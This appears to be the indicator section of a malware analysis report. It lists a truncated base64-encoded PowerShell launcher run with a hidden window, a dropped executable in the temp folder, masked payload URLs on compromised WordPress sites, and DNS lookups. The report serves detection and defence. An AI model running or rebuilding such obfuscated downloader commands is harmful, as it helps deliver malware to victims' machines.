Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAG8AaQA3AHgAagAwAD0AKAAoACcATgAzACcAKwAnAGIAZwAnACkAKwAoACcAcwAnACsAJwBjAHMAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AFQAZQBtAHAAXABXAE8AUgBEAFwAMgAwAD...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\word\2019\zlcoy_4.exe
- %TEMP%\word\2019\zlcoy_4.exe
- http://ca###oomz.com/wp-includes/rPG/
- http://ne###ekulac.com/wp-content/dTl4ul/
- http://to#####aelconfort.com/cgi-bin/wp/
- http://to#####aelconfort.com/cgi-sys/suspendedpage.cgi
- http://di###rmedia.com/wp-admin/8/
- http://di###rmedia.com/wp-admin/8
- http://av##mda.com/huseyingulgec.com.tr/cO1DS8G/
- DNS ASK ca###oomz.com
- DNS ASK ne###ekulac.com
- DNS ASK ho#####technologies.com
- DNS ASK to#####aelconfort.com
- DNS ASK aa#####itibhusawal.org
- DNS ASK di###rmedia.com
- DNS ASK av##mda.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAG8AaQA3AHgAagAwAD0AKAAoACcATgAzACcAKwAnAGIAZwAnACkAKwAoACcAcwAnACsAJwBjAHMAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AFQAZQBtAHAAXABXAE8AUgBEAFwAMgAwAD...' (with hidden window)